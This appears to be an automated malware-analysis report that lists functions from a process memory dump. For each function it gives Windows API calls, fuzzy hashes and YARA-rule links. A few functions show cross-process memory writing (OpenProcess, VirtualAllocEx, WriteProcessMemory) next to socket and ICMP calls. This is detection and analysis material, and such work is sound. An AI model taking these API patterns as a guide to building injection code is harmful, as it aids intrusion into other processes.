Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1786fdbb9705d58e8c684bbe5c3b14cb4cee3fed2422046b45cc73f16966d539
Instruction ID: f1b6b015714adbec694c827f535f7fc4d33f65a0e95601640cbba8f8336ce4a9
Opcode Fuzzy Hash: 1786fdbb9705d58e8c684bbe5c3b14cb4cee3fed2422046b45cc73f16966d539
Instruction Fuzzy Hash: 07219A75204A019BCB10EF29D8D4D6BB7A8FF99360B044669FD51C73A5EB30EC05CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00895005, Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00894E62: inet_addr.WSOCK32(?), ref: 00894E86

socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0089503B
WSAGetLastError.WSOCK32(00000000), ref: 0089504A
connect.WSOCK32(00000000,?,00000010), ref: 00895083
WSAGetLastError.WSOCK32(00000000), ref: 008950AA
closesocket.WSOCK32(00000000,00000000), ref: 008950BE

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$closesocketconnectinet_addrsocket
String ID:
API String ID: 245547762-0
Opcode ID: e8f1018c4bb096903c3eae8c1730c25c765aacc2a74f651a8189115a052636ee
Instruction ID: f69eabcc02c288496decd0e986aac73e12ce6ee519b878c755cd76a99721a2a8
Opcode Fuzzy Hash: e8f1018c4bb096903c3eae8c1730c25c765aacc2a74f651a8189115a052636ee
Instruction Fuzzy Hash: 28219D322005009FC710FF6CDC4AF6EB7A8FF85720F148649F845E7291CBB0A8418B95

Uniqueness

Uniqueness Score: -1.00%

Function 008770BF, Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 008770FC
ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 0087713C
SelectObject.GDI32(?,00000000), ref: 0087714C
BeginPath.GDI32(?), ref: 00877161
SelectObject.GDI32(?,00000000), ref: 0087718A

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Select$BeginCreateDeletePath
String ID:
API String ID: 2338827641-0
Opcode ID: a5b84029ad94a98fab6a5011093af2b0a3457dfe03ddd562d484c84b5e1a7e5b
Instruction ID: 9998339ad8fe2047b1ea6aa25120efda115454c00b9a3c39aa19d4b74dedb28d
Opcode Fuzzy Hash: a5b84029ad94a98fab6a5011093af2b0a3457dfe03ddd562d484c84b5e1a7e5b
Instruction Fuzzy Hash: ED218071806215EBCB11DF69EC48A9A7BACFB24320F148317F928D32A0DB30D841CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 008450CF, Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00841810: _doexit.LIBCMT ref: 0084181C

___set_flsgetvalue.LIBCMT ref: 008450E0

Part of subcall function 008477D1: TlsGetValue.KERNEL32(?,0084792A,?,008412DC,?,00000001), ref: 008477DA
Part of subcall function 008477D1: TlsSetValue.KERNEL32(00000000,?,008412DC,?,00000001), ref: 008477FB

___fls_getvalue@4.LIBCMT ref: 008450EB

Part of subcall function 008477B1: TlsGetValue.KERNEL32(?,?,00843C50,00000000), ref: 008477BF

___fls_setvalue@8.LIBCMT ref: 008450FD
GetLastError.KERNEL32(00000000,?,00000000), ref: 00845106
ExitThread.KERNEL32 ref: 0084510D
__freefls@4.LIBCMT ref: 00845129

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
String ID:
API String ID: 4247068974-0
Opcode ID: 1ce946c575b9dd0f4408ca69c865e3b8b3ae7c18b1f17b7f56d22af486346cd1
Instruction ID: 94879245c828b1b1b9498f9f305175ad97d8ae90562f059bc07bc0d74f4605c0
Opcode Fuzzy Hash: 1ce946c575b9dd0f4408ca69c865e3b8b3ae7c18b1f17b7f56d22af486346cd1
Instruction Fuzzy Hash: BDE0EC3580420D6BDF1037F99D1EA5E7A6DFE08744B510820BA10E2137EF2888618663

Uniqueness

Uniqueness Score: -1.00%

Function 0087F37B, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON

Download Yara Rule

Strings

U, xrefs: 0087FAFE
), xrefs: 0087F37F
\, xrefs: 0087CFD7

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: )$U$\
API String ID: 0-3705770531
Opcode ID: 58c396340462427835f3f1434386d3f16142e24c437a5ca17cb664bac50afbbc
Instruction ID: daf2d53de8921268da3ce60401e0f512e1c2c10dfd9b362ede410098338afe08
Opcode Fuzzy Hash: 58c396340462427835f3f1434386d3f16142e24c437a5ca17cb664bac50afbbc
Instruction Fuzzy Hash: 0AC1B070A04209CFCB15CF6AC5806ADBBF2FF99304F24C1AAC95ADB259D7319946CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0087E0F6, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0087E976

Strings

\, xrefs: 0087CFD7

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID: \
API String ID: 4104443479-2967466578
Opcode ID: a16cccd73643797297571de6a24c8445033b37617175d913161087740615248b
Instruction ID: b7fc8ddaba55b93c1ecf267cc90e62febb5d8f5bdb84d68512d891fe484f0b6d
Opcode Fuzzy Hash: a16cccd73643797297571de6a24c8445033b37617175d913161087740615248b
Instruction Fuzzy Hash: 6FB1AB70D04258CFCB19CFA8C8907ADBBB2FF59308F2881A9D059EB399D7759942CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0087E0FF, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0087E976

Strings

\, xrefs: 0087CFD7

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID: \
API String ID: 4104443479-2967466578
Opcode ID: 04201e1f9d40ea653221d69ff468ba7a83748985058a0327f7c689b10779001c
Instruction ID: 1d3f63889f5c7d611afc6f8865402084764bf64cf6580b1ae780d9264c62b325
Opcode Fuzzy Hash: 04201e1f9d40ea653221d69ff468ba7a83748985058a0327f7c689b10779001c
Instruction Fuzzy Hash: 22B1AC70D04258CFCB19CFA8C8907ADBBB2FF59308F2881A9D059EB399C7759942CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0087E10F, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0087E976

Strings

\, xrefs: 0087CFD7

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID: \
API String ID: 4104443479-2967466578
Opcode ID: d9bdf231729333eacf392e503123c4a97e9982ada3a7931311debc763de15183
Instruction ID: ae3cf539bbf5f8edfb4aa1761d4c2f1c9e9fc10425c5857051b6eae1e4016f7c
Opcode Fuzzy Hash: d9bdf231729333eacf392e503123c4a97e9982ada3a7931311debc763de15183
Instruction Fuzzy Hash: 31A1AC70D04258CFDB19CFA8C8907ADBBB2FF59308F2881A9D059EB399C7759942CB51

Uniqueness

Uniqueness Score: -1.00%

Function 008A8357, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON

Download Yara Rule

APIs

Part of subcall function 00872654: _wcslen.LIBCMT ref: 00872680

CoInitialize.OLE32(00000000), ref: 008A83FC
CoCreateInstance.OLE32(008B2A08,00000000,00000001,008B28A8,?), ref: 008A8415
CoUninitialize.OLE32 ref: 008A85F6

Strings

.lnk, xrefs: 008A83A5, 008A83B8

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: dcfa6b5067ef9637c5aa167e3c0799023764f5de4aabc1b3e1811d6f2c82b431
Instruction ID: d017916adfa1d1c7a71c89bdf3a0eb5c22b42322aa5ba885663c2a5a59977607
Opcode Fuzzy Hash: dcfa6b5067ef9637c5aa167e3c0799023764f5de4aabc1b3e1811d6f2c82b431
Instruction Fuzzy Hash: A5810971244301AFD210EB98DC82F5AB7E5FBC8714F108928FA58DB2E1D6B5ED45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00866528, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00864300: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00864331

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00866579

Part of subcall function 008642C4: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 008642F5

Part of subcall function 00864394: GetWindowThreadProcessId.USER32(?,?), ref: 008643C7
Part of subcall function 00864394: OpenProcess.KERNEL32(00000438,00000000,?), ref: 008643D8
Part of subcall function 00864394: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 008643EF

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008665E9
SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00866669

Strings

@, xrefs: 00866682

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: b393114116304fcd79fa2012040098f7136b89ef2591e17053c9571b910e9a3c
Instruction ID: 00e947b8d6269f9f5e876227dd05d4aca982ab8c67831a783c55eca8b85265cf
Opcode Fuzzy Hash: b393114116304fcd79fa2012040098f7136b89ef2591e17053c9571b910e9a3c
Instruction Fuzzy Hash: 92517676A002186BCB10DFA8DD86FDEB778FF99300F014595F705EB181D6B0AA45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0087F0AD, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0087CF87

Strings

], xrefs: 0087F0AE
h, xrefs: 0087F704
\, xrefs: 0087CFD7

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID: \$]$h
API String ID: 4104443479-3262404753
Opcode ID: 03f9ade20a024513ca8df49aec30e87a138459ba33d8d51d79fe54e6241c4870
Instruction ID: 81b1ae0da31ca2a2d77f0adbaeb1b0a1046cf18495603b1d9be5c0ff62d59ca0
Opcode Fuzzy Hash: 03f9ade20a024513ca8df49aec30e87a138459ba33d8d51d79fe54e6241c4870
Instruction Fuzzy Hash: 8A517C70A002098FCF18CF69C8909ADB7B2FF99304F28C26DE519EB259D7709A41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00865223, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511

CLSIDFromString.OLE32(?,00000000), ref: 00865244
SafeArrayAccessData.OLEAUT32(?,?), ref: 00865293
SafeArrayUnaccessData.OLEAUT32(?), ref: 008652C2

Strings

crts, xrefs: 008652A0

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
String ID: crts
API String ID: 943502515-3724388283
Opcode ID: 0634305af54a3400b3727e8cec24059ae817b3c1c4dc6f9a859d698682f3151a
Instruction ID: 8d9b196bba731ecd8d52c815d6b593e9e8492e01745e3ab6c640ed6dcf9caadd
Opcode Fuzzy Hash: 0634305af54a3400b3727e8cec24059ae817b3c1c4dc6f9a859d698682f3151a
Instruction Fuzzy Hash: 06214A766006159FC314CF8AE888C96FBE8FF98761705C52AE949CB721D330E891CB94

Uniqueness

Uniqueness Score: -1.00%

Function 008611F9, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ICMP.DLL), ref: 0086120B
GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 0086121D

Strings

IcmpSendEcho, xrefs: 00861217
ICMP.DLL, xrefs: 00861206

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: ICMP.DLL$IcmpSendEcho
API String ID: 2574300362-58917771
Opcode ID: 8b27b42bfa094b818a38673bd555219198b33d704a0286285f48ee930d171be8
Instruction ID: 3b6e8f35a44c868aab971aa86e397b750e56cb0a9807c78e31b14513ec9297ea
Opcode Fuzzy Hash: 8b27b42bfa094b818a38673bd555219198b33d704a0286285f48ee930d171be8
Instruction Fuzzy Hash: 0FE012719003469FDB609F95E84964777D8FB18751B044429E955D2750D7B4E88086A4

Uniqueness

Uniqueness Score: -1.00%

Function 0086122B, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ICMP.DLL), ref: 0086123D
GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0086124F

Strings

IcmpCloseHandle, xrefs: 00861249
ICMP.DLL, xrefs: 00861238

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: ICMP.DLL$IcmpCloseHandle
API String ID: 2574300362-3530519716
Opcode ID: f32ca4018ee7032c232bc9ff7645584d23c334e6025a51bc5d06a68b039bfcec
Instruction ID: 8180eb4e0fc0be7676d588070cc7eaafa9963a82ccb946522e398b17db8f4df4
Opcode Fuzzy Hash: f32ca4018ee7032c232bc9ff7645584d23c334e6025a51bc5d06a68b039bfcec
Instruction Fuzzy Hash: 0CE012715407069FDB209F56D84C64677D8FF18752B044529E955D2750D7B4E48087A4

Uniqueness

Uniqueness Score: -1.00%

Function 0086125D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ICMP.DLL), ref: 0086126F
GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00861281

Strings

ICMP.DLL, xrefs: 0086126A
IcmpCreateFile, xrefs: 0086127B

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: ICMP.DLL$IcmpCreateFile
API String ID: 2574300362-275556492
Opcode ID: 6a0e28f6f430bcb6ed2fbbac87c4c4bdf9d18ea284c91a5fd770902dde1f597e
Instruction ID: eb983d6f45a9410e57a551ba08c05a173e8790ac260db92bf6b13e0794ec787d
Opcode Fuzzy Hash: 6a0e28f6f430bcb6ed2fbbac87c4c4bdf9d18ea284c91a5fd770902dde1f597e
Instruction Fuzzy Hash: 53E0C2704003069FCB608F51D80864677D8FB18312B004429E442D2360CBB4E4808BA0

Uniqueness

Uniqueness Score: -1.00%

Function 008A812C, Relevance: 6.2, APIs: 4, Instructions: 176COMMON

Download Yara Rule

APIs

Part of subcall function 00831D10: _wcslen.LIBCMT ref: 00831D11
Part of subcall function 00831D10: _memmove.LIBCMT ref: 00831D57

SetErrorMode.KERNEL32 ref: 008A8188
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 008A8341

Part of subcall function 0086397D: GetFileAttributesW.KERNELBASE(?), ref: 00863984

SetErrorMode.KERNEL32(?), ref: 008A822A
SetErrorMode.KERNEL32(?), ref: 008A82FA

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorMode$AttributesFile_memmove_wcslen
String ID:
API String ID: 3884216118-0
Opcode ID: 019334be9a68a00772aec2f5a13a1e611be7b5222fc59ca62e296cebcedaea91
Instruction ID: 39182b89e2c68f315b6dc445df411ad99e7e5e09dca3281d98c820bdc5b18cd9
Opcode Fuzzy Hash: 019334be9a68a00772aec2f5a13a1e611be7b5222fc59ca62e296cebcedaea91
Instruction Fuzzy Hash: A66166716083419BC710EF68D881A5BB7E0FFC9714F04892DFA899B391C672ED05CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 008A94BA, Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 008A94C9
SysAllocString.OLEAUT32(00000000), ref: 008A9592
VariantCopy.OLEAUT32(?,?), ref: 008A95C9
VariantClear.OLEAUT32(?), ref: 008A960A

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 02969dd4f889b21022ce429c4fe43232fd71d624818eab8bcb28625960cad946
Instruction ID: f85d4f914b2fcf81ee6bb544909420aac37895e5193392fbdf72e1be983b7271
Opcode Fuzzy Hash: 02969dd4f889b21022ce429c4fe43232fd71d624818eab8bcb28625960cad946
Instruction Fuzzy Hash: 1151D236204209A6DB00FF2DD8415AEB764FF85361F508526FD48D7642EB30DA25C7E3

Uniqueness

Uniqueness Score: -1.00%

Function 0084407F, Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0084411A
__flush.LIBCMT ref: 00844138
__write.LIBCMT ref: 0084415F
__flsbuf.LIBCMT ref: 0084418A

Part of subcall function 00847E9A: __getptd_noexit.LIBCMT ref: 00847E9A

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 5577a25a8bf7660d1eb98eb86be2243cf7e8e14d6244587b41df67c47af93e11
Instruction ID: 21666c3348da4075483017d0f5ad31d330d1d4ea31fc33d43928314c5553e4a7
Opcode Fuzzy Hash: 5577a25a8bf7660d1eb98eb86be2243cf7e8e14d6244587b41df67c47af93e11
Instruction Fuzzy Hash: 2341B031A00B4C9BDF24CFA9888479EBBB5FFA0764F249629E525D7280D770DE95CB40

Uniqueness

Uniqueness Score: -1.00%

Function 008715F9, Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32 ref: 00871621
GetWindowRect.USER32 ref: 008716A9
PtInRect.USER32(?,?,?), ref: 008716BB
MessageBeep.USER32(00000000), ref: 00871734

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
